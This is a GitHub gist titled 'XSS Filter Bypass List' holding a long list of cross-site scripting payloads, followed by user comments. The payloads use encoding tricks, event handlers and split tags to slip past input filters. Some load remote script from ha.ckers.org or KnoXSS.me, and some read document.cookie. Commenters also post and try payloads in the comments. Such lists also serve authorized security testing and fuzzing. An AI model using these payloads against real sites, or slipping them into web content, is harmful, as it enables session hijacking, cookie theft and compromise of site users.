Instantly share code, notes, and snippets.

Embed
What would you like to do?
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
@ninja25538

This comment has been minimized.

Copy link

ninja25538 commented Aug 8, 2017

Nice!, Thanks!

@Noob-Walid

This comment has been minimized.

Copy link

Noob-Walid commented Oct 12, 2017

which worked most??

@Amarnath403

This comment has been minimized.

Copy link

Amarnath403 commented Apr 6, 2018

test

@CesBear

This comment has been minimized.

Copy link

CesBear commented May 8, 2018

cool

@xeno6696

This comment has been minimized.

Copy link

xeno6696 commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.

@0xINT3

This comment has been minimized.

Copy link

0xINT3 commented Sep 1, 2018

many don't even work. websites are getting smart. :/

@sittminzaw

This comment has been minimized.

Copy link

sittminzaw commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work

@IvanGuGon1

This comment has been minimized.

Copy link

IvanGuGon1 commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

rip github xss protection

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

start with > and without the spaces

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

fuck

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

<h1>no</h1>

@Marshmellow471

This comment has been minimized.

Copy link

Marshmellow471 commented Jan 26, 2019

no

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

S05PWA==

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

PDFLTk9YPDE=

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

'"KNOX

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

KNOX\

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

confirmK

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

(confirm)(1)

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

'-confirmK-'

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

"-confirmK-"

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

${(confirm)(1)}

@shamrocksu88

This comment has been minimized.

Copy link

shamrocksu88 commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

iji

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>
@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 12, 2019

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

Lol

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

test

@nizeman72

This comment has been minimized.

Copy link

nizeman72 commented Feb 16, 2019

<script>alert(fuck)</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment